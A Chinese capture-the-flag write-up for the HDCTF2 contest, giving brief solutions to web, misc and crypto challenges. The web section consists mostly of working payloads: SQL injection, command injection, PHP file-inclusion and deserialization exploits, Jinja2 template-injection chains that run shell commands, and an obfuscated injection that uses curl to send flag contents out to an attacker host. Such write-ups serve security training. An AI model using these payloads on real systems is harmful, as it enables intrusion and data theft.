前段时间创建了海南大学举报的hdctf2。以校外的身份参加，最后获得了举办方提供的小礼品，非常感谢

web

by Firebasky

signin

查看源代码，base64解密

babysql

https://bbs.ichunqiu.com/thread-44483-1-1.html

查看字段

payload:1'order by 3%23

获得flag:1'union select 1,2,flag from flag%23

babyrce

payload：127.0.0.1|cat /flag

easy_git

https://www.cnblogs.com/Lmg66/p/13598803.html

使用GitHack 工具

python GitHack.py -u 8.129.15.153:20003/.git/

HDCTF{ACTF_.git_leak_is_dangerous}

注：可能一次不成功，可以多尝试几次

backup_file

/index.php.bak下载备份文件

弱类型比较

?key=123

easy_file_include

php://filter/read=convert.base64-encode/resource=flag.php

do_u_know_HTTP

根据提示进行添加 添加参数是

Mg:

erciyuan

这道题一点点坑，思路是进行文件包含，读取文件，必须知道加密格式，结果加密格式在返回包里面

Hint: !HDCTF!.php && bin2hex(base64_encode(gzdeflate($file)))

第二个坑是将!换成了HnuSec，读取源代码发现的

<?php $a='HnuSecHDCTFHnuSec.php'; echo (bin2hex(base64_encode(gzdeflate($a)))); #383867724455354e396e4278446e487a41445031436a494b41413d3d

获得flag

hash_hmac

post:

x[]=1&y[]=2

welcome

登录成功就OK

用户名：admin

密码直接给你了

calculator_v1

因为没有对参数进行过滤可以执行命令

open("flag").read()

__import__('os').popen('cat flag').read()

ezflask

https://www.cnblogs.com/bmjoker/p/13508538.html

https://blog.csdn.net/a3320315/article/details/104102979?utm_source=app

{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("cat flag").read()') }} {% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}

dudaima

https://zhuanlan.zhihu.com/p/102166928?utm_source=qq

<?php show_source(__FILE__); error_reporting(0); include "lib.php"; class Just4Fun { public $enter; public $secret; } if(isset($_GET["pass"])) { $o = unserialize($_GET["pass"]); $o->secret = bin2hex(random_bytes(256)); if ($o->secret === $o->enter){ echo FLAG; }else{ die("secret or enter wrong!"); } }else{ die("no pass"); } #代码非常简单，就是让Just4Fun类里面的属性值相同就获得flag #但是secret的值我们不知道，但是我们知道他的地址不会改变。

payload:

<?php error_reporting(0); class Just4Fun { public $enter; public $secret; } $a =new Just4Fun(); $a->enter=&$a->secret;//这里的a=&b 即代表将b的指针赋值给a 无论b的值怎么变 a始终等于b echo serialize($a); #O:8:"Just4Fun":2:{s:5:"enter";N;s:6:"secret";R:2;}

getshell

<?php $str = $_POST['str']; if(isset($str)){ $sp = ","; $kv = "="; $arr = str_replace(array($kv,$sp),array('"=>"','","'),'array("'.$str.'")'); eval("\$arr"." = $arr;"); }else{ show_source(__FILE__); }

通过闭合前面和注释后面绕过

payload:");system('cat flag.php');//

warmup

和wecome一样的

welcome_to_the_new

简单的反序列化

#payload <?php error_reporting(0); Class Stu{ private $name; private $age; private $sex; public $info = 'php://filter/read=convert.base64-encode/resource=flag.php'; } $someone = new Stu('M&G', 20, 'Man'); echo urlencode(serialize($someone));

calculator_v2

open('flag').__class__.__dict__['re'+'ad'](open('flag'))

simple_trick

https://blog.csdn.net/moliyiran/article/details/81172325

<?php highlight_file(__FILE__); include('flag.php'); $a = $_GET['a']; $b = unserialize ($a); $b->c = $flag; foreach($b as $key => $value) { if($key==='c') { continue; } echo $value; } ?> #payload #m3w师傅 <?php $a=new stdClass(); //借用内置类声明对象 $a->b=&$a->c; //将c的地址附给b // print_r($a); echo serialize($a); ?>

welcome_to_the_new2

在welcome_to_the_new1的基础上添加了php字符串解析漏洞

https://www.freebuf.com/articles/web/213359.html

#payload <?php error_reporting(0); Class Stu{ private $name; private $age; private $sex; public $info = 'php://filter/read=convert.base64-encode/resource=flag.php'; } $someone = new Stu('M&G', 20, 'Man'); echo urlencode(serialize($someone)); #O%3A3%3A%22Stu%22%3A4%3A%7Bs%3A9%3A%22%00Stu%00name%22%3BN%3Bs%3A8%3A%22%00Stu%00age%22%3BN%3Bs%3A8%3A%22%00Stu%00sex%22%3BN%3Bs%3A4%3A%22info%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D

传递的参数和值是

Hai[nan.University=O%3A3%3A%22Stu%22%3A4%3A%7Bs%3A9%3A%22%00Stu%00name%22%3BN%3Bs%3A8%3A%22%00Stu%00age%22%3BN%3Bs%3A8%3A%22%00Stu%00sex%22%3BN%3Bs%3A4%3A%22info%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D

calculator_v3

#m3w师傅的payload http://8.129.15.153:20020/?question=exec("__import__('o'%2b's').po"%2b"pen('curl -d `find / -name \"flag*\"|base64 -w 0` ip:端口').re"%2b"ad()") 先用这个payload带回flag的位置 http://8.129.15.153:20020/?question=exec("__import__('o'%2b's').po"%2b"pen('curl -d `cat /usr/src/app/flag|base64 -w 0` ip:端口').re"%2b"ad()") 再用这个带回flag

ezflask

{{"".__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['po'+'pen']("cat fl""ag").read()}}

misc

签到题

直接上flag

一步之遥

zip伪加密，修改最后数据01===》00

你知道lsb是什么意思吗

利用zsteg查看照片,发现存在zip,和flag

zsteg -E "b1,rgb,lsb,xy" 1.png > flag.zip

利用crc暴力破解

girlfriend

通过Wireshark打开，从http分离照片获得flag

嘤语

将嘤换成-去解密

你真的了解dns吗

考察 dns的txt解析

payload：nslookup -qt=txt hdctf.0x00.work

密码

起源

凯撒密码加密

围住世界

相当于栅栏密码的变性，需要自己推

3 6 6 6 3

有趣起来了

考察埃特巴什码